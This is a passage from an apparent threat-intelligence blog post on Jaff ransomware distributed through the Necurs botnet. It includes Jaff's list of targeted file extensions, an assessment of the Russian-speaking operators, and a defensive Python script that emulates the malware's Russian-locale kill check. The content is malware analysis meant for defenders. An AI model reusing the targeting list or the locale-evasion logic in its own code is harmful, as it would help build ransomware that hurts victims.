.xlsx .acd .pdf .pfx .crt .der .cad .dwg .MPEG .rar .veg .zip .txt .jpg .doc .wbk .mdb .vcf .docx .ics .vsc .mdf .dsr .mdi .msg .xls .ppt .pps .obd .mpd .dot .xlt .pot .obt .htm .html .mix .pub .vsd .png .ico .rtf .odt .3dm .3ds .dxf .max .obj .7z .cbr .deb .gz .rpm .sitx .tar .tar.gz .zipx .aif .iff .m3u .m4a .mid .key .vib .stl .psd .ova .xmod .wda .prn .zpf .swm .xml .xlsm .par .tib .waw .001 .002 .003 .004 .005 .006 .007 .008 .009 .010 .contact .dbx .jnt .mapimail .oab .ods .ppsm .pptm .prf .pst .wab .1cd .3g2 .7ZIP .accdb .aoi .asf .asp .aspx .asx .avi .bak .cer .cfg .class .config .css .csv .db .dds .fif .flv .idx .js .kwm .laccdb .idf .lit .mbx .md .mlb .mov .mp3 .mp4 .mpg .pages .php .pwm .rm .safe .sav .save .sql .srt .swf .thm .vob .wav .wma .wmv .xlsb .aac .ai .arw .c .cdr .cls .cpi .cpp .cs .db3 .docm .dotm .dotx .drw .dxb .eps .fla .flac .fxg .java .m .m4v .pcd .pct .pl .potm .potx .ppam .ppsx .ps .pspimage .r3d .rw2 .sldm .sldx .svg .tga .wps .xla .xlam .xlm .xltm .xltx .xlw .act .adp .al .bkp .blend .cdf .cdx .cgm .cr2 .dac .dbf .dcr .ddd .design .dtd .fdb .fff .fpx .h .iif .indd .jpeg .mos .nd .nsd .nsf .nsg .nsh .odc .odp .oil .pas .pat .pef .ptx .qbb .qbm .sas7bdat .say .st4 .st6 .stc .sxc .sxw .tlg .wad .xlk .aiff .bin .bmp .cmt .dat .dit .edb .flvv .gif .groups .hdd .hpp .log .m2ts .m4p .mkv .ndf .nvram .ogg .ost .pab .pdb .pif .qed .qcow .qcow2 .rvt .st7 .stm .vbox .vdi .vhd .vhdx .vmdk .vmsd .vmx .vmxf .3fr .3pr .ab4 .accde .accdt .ach .acr .adb .srw .st5 .st8 .std .sti .stw .stx .sxd .sxg .sxi .sxm .tex .wallet .wb2 .wpd .x11 .x3f .xis .ycbcra .qbw .qbx .qby .raf .rat .raw .rdb .rwl .rwz .s3db .sd0 .sda .sdf .sqlite .sqlite3 .sqlitedb .sr .srf .oth .otp .ots .ott .p12 .p7b .p7c .pdd .pem .plus_muhd .plc .pptx .psafe3 .py .qba .qbr .myd .ndd .nef .nk .nop .nrw .ns2 .ns3 .ns4 .nwb .nx2 .nxl .nyf .odb .odf .odg .odm .ord .otg .ibz .iiq .incpas .jpe .kc2 .kdbx .kdc .kpdx .lua .mdc .mef .mfw .mmw .mny .moneywell .mrw .des .dgc .djvu .dng .drf .dxg .eml .erbsql .erd .exf .ffd .fh .fhd .gray .grey .gry .hbk .ibank .ibd .cdr4 .cdr5 .cdr6 .cdrw .ce1 .ce2 .cib .craw .crw .csh .csl .db_journal .dc2 .dcs .ddoc .ddrw .ads .agdl .ait .apj .asm .awg .back .backup .backupdb .bank .bay .bdb .bgt .bik .bpw .cdr3 .as4 .tif .asp .hdr .iso

Images 16-17: Jaff ransomware victim payment page and admin panel on the Tor hidden website.

Assessment

Flashpoint analysts continue to monitor the cybercriminal syndicate behind Jaff ransomware. These actors use machines infected with the Necurs rootkit as a spam botnet to deliver email with malicious attachments. Flashpoint assesses with moderate confidence that the threat actors who once favored Locky have likely switched to Jaff.

This Jaff syndicate remains one of the most active groups in the cybercrime landscape. Virtually every Russian-language cybercrime gang observes an informal rule against criminal activity directed at Russian nationals and other residents of the Commonwealth of Independent States (CIS), in order to avoid being targeted by Russian law enforcement. With the steady flow of press releases from Russian law enforcement announcing the arrest of major cybercrime gangs, that exposure remains a constant in the risk calculations of Russian-speaking cybercriminals. The Jaff actors likewise continue to avoid Russian-language victims through the Windows API checks described above, which further supports the hypothesis that the cybercriminals behind Jaff operate in a Russian-speaking country.

Mitigation

One possible Jaff mitigation is to set the machine's language to Russian. Among its first steps, the ransomware checks the machine's language via the GetSystemDefaultLangID and GetUserDefaultLangID APIs; if either reports Russian, Jaff terminates itself. Because the check masks off the sublanguage, any Russian regional variant satisfies it. Note that GetUserDefaultLangID reflects the user's Region Format setting and GetSystemDefaultLangID the system locale (the language for non-Unicode programs), so the Windows display language itself does not have to change. This workaround is specific to Jaff's current check and offers no protection against families that test something else or nothing at all.
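The following script reimplements the locale check from the disassembled routine shown earlier and reads the same two LANGIDs on a Windows host, so the mitigation above can be verified on a machine before anyone relies on it. It is an added example, not code from the Flashpoint analysis or from the malware; the LANGID constants are standard Windows values, and the sample user/system combinations are constructed to exercise the check.

```python
"""Emulate Jaff's Russian-locale check and read the same LANGIDs on Windows.

Added example, not Flashpoint's code or the malware's. It mirrors the
disassembled routine: mask the LANGID with 0x3FF, compare with 0x19, and
abort if either the user or the system LANGID matches.
"""
import ctypes
import sys

PRIMARY_LANG_MASK = 0x3FF   # low 10 bits of a LANGID hold the primary language
LANG_RUSSIAN = 0x19         # primary language ID Jaff compares against

# Standard Windows LANGIDs used here as sample inputs.
LANGID_EN_US = 0x0409       # English (United States)
LANGID_RU_RU = 0x0419       # Russian (Russia)
LANGID_RU_MD = 0x0819       # Russian (Moldova): same primary language, other sublanguage
LANGID_UK_UA = 0x0422       # Ukrainian (Ukraine): not matched by the check


def primary_lang(langid):
    """Mirror `and ax, 3FFh`: keep only the primary language ID."""
    return langid & PRIMARY_LANG_MASK


def jaff_would_terminate(user_langid, system_langid):
    """Mirror the two-step routine: terminate if either LANGID is Russian."""
    return any(primary_lang(lid) == LANG_RUSSIAN for lid in (user_langid, system_langid))


def current_langids():
    """Read the two LANGIDs the same way Jaff does (Windows only)."""
    if sys.platform != "win32":
        raise OSError("GetUserDefaultLangID/GetSystemDefaultLangID exist only on Windows")
    kernel32 = ctypes.windll.kernel32
    kernel32.GetUserDefaultLangID.restype = ctypes.c_ushort
    kernel32.GetSystemDefaultLangID.restype = ctypes.c_ushort
    return kernel32.GetUserDefaultLangID(), kernel32.GetSystemDefaultLangID()


def host_is_mitigated():
    """True if this Windows host would make Jaff abort before encrypting."""
    user_langid, system_langid = current_langids()
    return jaff_would_terminate(user_langid, system_langid)


if __name__ == "__main__":
    # Constructed combinations of user and system LANGIDs.
    samples = (
        ("en-US user, en-US system", LANGID_EN_US, LANGID_EN_US),
        ("ru-RU user, en-US system", LANGID_RU_RU, LANGID_EN_US),
        ("en-US user, ru-MD system", LANGID_EN_US, LANGID_RU_MD),
        ("uk-UA user, en-US system", LANGID_UK_UA, LANGID_EN_US),
    )
    for label, user_id, system_id in samples:
        print(f"{label}: terminates={jaff_would_terminate(user_id, system_id)}")
    if sys.platform == "win32":
        print("this host mitigated:", host_is_mitigated())
```

Run it on the host after changing the Region Format or system locale: host_is_mitigated() returning True means the check as disassembled would fire, while the Ukrainian sample shows that neighbouring CIS locales are not covered, since Jaff compares only against the Russian primary language ID.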

Organizations should continue to proactively collect indicators of compromise (IOCs) for ongoing ransomware campaigns, as families such as Jaff change quickly and their operators adapt once IOCs are published. As ransomware continues to evolve, it is crucial to develop and maintain good security hygiene, including robust patch and vulnerability management, data encryption, regularly tested data backups, and strict user-access controls.

Attachments & Downloads

The Jaff ransomware indicators of compromise (IOCs) were provided as a download accompanying the original post.

Sources

https://www.flashpoint-intel.com/blog/necurs-dating-scam 
https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet

The post “Necurs” Botnet Fuels Massive Spam Campaigns Spreading “Jaff” Ransomware appeared first on Flashpoint.

Author: Chelsea Sawicki